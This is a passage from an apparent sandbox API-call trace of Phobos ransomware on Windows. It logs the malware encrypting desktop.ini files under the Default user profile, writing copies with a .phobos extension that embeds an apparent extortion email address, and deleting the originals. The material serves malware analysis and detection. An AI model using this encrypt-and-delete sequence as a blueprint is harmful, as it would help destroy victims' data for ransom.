dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.921] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.921] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2c0, lpOverlapped=0x0) returned 1 [0202.921] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0) returned 1 [0202.921] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d0, lpOverlapped=0x0) returned 1 [0202.922] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.922] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.922] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.922] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.922] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.922] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.922] CloseHandle (hObject=0x160) returned 1 [0202.922] CloseHandle (hObject=0xfc) returned 1 [0202.922] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini")) returned 1 [0202.925] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.925] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=678) returned 1 [0202.925] CloseHandle (hObject=0xfc) returned 1 [0202.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 0x26 [0202.925] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.926] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.926] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.926] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.926] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.926] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2a6, lpOverlapped=0x0) returned 1 [0202.927] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b0, dwBufLen=0x2b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b0) returned 1 [0202.927] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2b0, lpOverlapped=0x0) returned 1 [0202.928] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.928] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.928] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.928] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.928] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.928] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.928] CloseHandle (hObject=0xfc) returned 1 [0202.928] CloseHandle (hObject=0x160) returned 1 [0202.928] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 1 [0202.929] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.930] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=738) returned 1 [0202.930] CloseHandle (hObject=0x160) returned 1 [0202.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 0x26 [0202.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.930] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.930] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.931] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.931] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.931] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2e2, lpOverlapped=0x0) returned 1 [0203.085] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f0, dwBufLen=0x2f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f0) returned 1 [0203.085] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2f0, lpOverlapped=0x0) returned 1 [0203.086] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.086] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.086] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.086] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.086] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.086] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.086] CloseHandle (hObject=0x160) returned 1 [0203.086] CloseHandle (hObject=0xfc) returned 1 [0203.086] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini")) returned 1 [0203.087] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.088] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=412) returned 1 [0203.088] CloseHandle (hObject=0xfc) returned 1 [0203.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini")) returned 0x26 [0203.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\contacts\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.088] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.088] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\contacts\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.089] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.089] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.089] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x19c, lpOverlapped=0x0) returned 1 [0203.090] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0) returned 1 [0203.090] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a0, lpOverlapped=0x0) returned 1 [0203.091] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.091] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.091] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.091] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.091] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.091] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.091] CloseHandle (hObject=0xfc) returned 1 [0203.091] CloseHandle (hObject=0x160) returned 1 [0203.091] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini")) returned 1 [0203.092] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.093] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=282) returned 1 [0203.093] CloseHandle (hObject=0x160) returned 1 [0203.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini")) returned 0x26 [0203.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\desktop\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.093] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.093] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\desktop\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.093] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.093] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.093] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11a, lpOverlapped=0x0) returned 1 [0203.094] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0203.094] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0203.095] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.095] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.095] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.095] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.095] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.095] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.095] CloseHandle (hObject=0x160) returned 1 [0203.095] CloseHandle (hObject=0xfc) returned 1 [0203.095] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini")) returned 1 [0203.096] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.097] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=402) returned 1 [0203.097] CloseHandle (hObject=0xfc) returned 1 [0203.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini")) returned 0x26 [0203.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\documents\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.097] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.097] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\documents\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.098] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.098] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.098] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x192, lpOverlapped=0x0) returned 1 [0203.099] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0) returned 1 [0203.099] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a0, lpOverlapped=0x0) returned 1 [0203.099] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.099] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.099] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.099] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.099] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.099] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.100] CloseHandle (hObject=0xfc) returned 1 [0203.100] CloseHandle (hObject=0x160) returned 1 [0203.100] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini")) returned 1 [0203.100] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.100] CreateFileW 